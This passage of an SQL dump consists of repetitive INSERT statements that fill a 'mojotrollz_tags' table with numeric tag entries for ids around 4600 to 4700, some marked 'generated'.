(`id`, `table`, `type`, `value`, `comment`) VALUES (4600, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4600, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4601, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4601, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4601, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4601, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4601, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4602, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4602, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4602, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4602, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4602, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4603, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4603, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4603, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4603, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4603, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4604, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4604, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4604, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4604, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4604, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4605, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4605, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4605, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4605, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4605, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4606, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4606, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4606, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4606, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4606, 1, 32, 7, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4606, 1, 33, 5, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4606, 1, 35, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4607, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4607, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4607, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4607, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4607, 1, 32, 7, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4607, 1, 33, 5, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4607, 1, 35, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4608, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4608, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4608, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4608, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4608, 1, 32, 7, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4608, 1, 33, 5, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4608, 1, 35, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4609, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4609, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4609, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4609, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4609, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4610, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4610, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4610, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4610, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4610, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4611, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4611, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4611, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4611, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4611, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4612, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4612, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4612, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4612, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4612, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4613, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4613, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4613, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4613, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4613, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4614, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4614, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4614, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4614, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4614, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4615, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4615, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4615, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4615, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4615, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4616, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4616, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4616, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4616, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4616, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4617, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4617, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4617, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4617, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4617, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4618, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4618, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4619, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4619, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4620, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4620, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4623, 1, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4623, 1, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4623, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4624, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4624, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4625, 1, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4625, 1, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4625, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4627, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4629, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4629, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4630, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4630, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4631, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4631, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4632, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4632, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4633, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4633, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4634, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4634, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4635, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4635, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4636, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4636, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4637, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4637, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4638, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4638, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4639, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4639, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4640, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4640, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4641, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4641, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4642, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4642, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4643, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4643, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4644, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4644, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4645, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4645, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4646, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4646, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4647, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4647, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4648, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4648, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4649, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4649, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4651, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4651, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4652, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4652, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4653, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4653, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4654, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4654, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4655, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4655, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4656, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4656, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4657, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4657, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4658, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4658, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4659, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4659, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4660, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4661, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4662, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4662, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4663, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4663, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4664, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4664, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4665, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4665, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4666, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4666, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4667, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4667, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4668, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4668, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4670, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4670, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4671, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4671, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4672, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4672, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4673, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4673, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4674, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4674, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4675, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4675, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4676, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4676, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4677, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4677, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4678, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4678, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4679, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4679, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4680, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4680, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4681, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4681, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4682, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4682, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4684, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4684, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4685, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4685, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4686, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4686, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4687, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4687, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4688, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4688, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4689, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4689, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4690, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4690, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4692, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4692, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4693, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4693, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4694, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4694, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4695, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4695, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4696, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4696, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4697, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4697, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4699, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4699, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4700, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4700, 1, 30, 0, 'generated'); 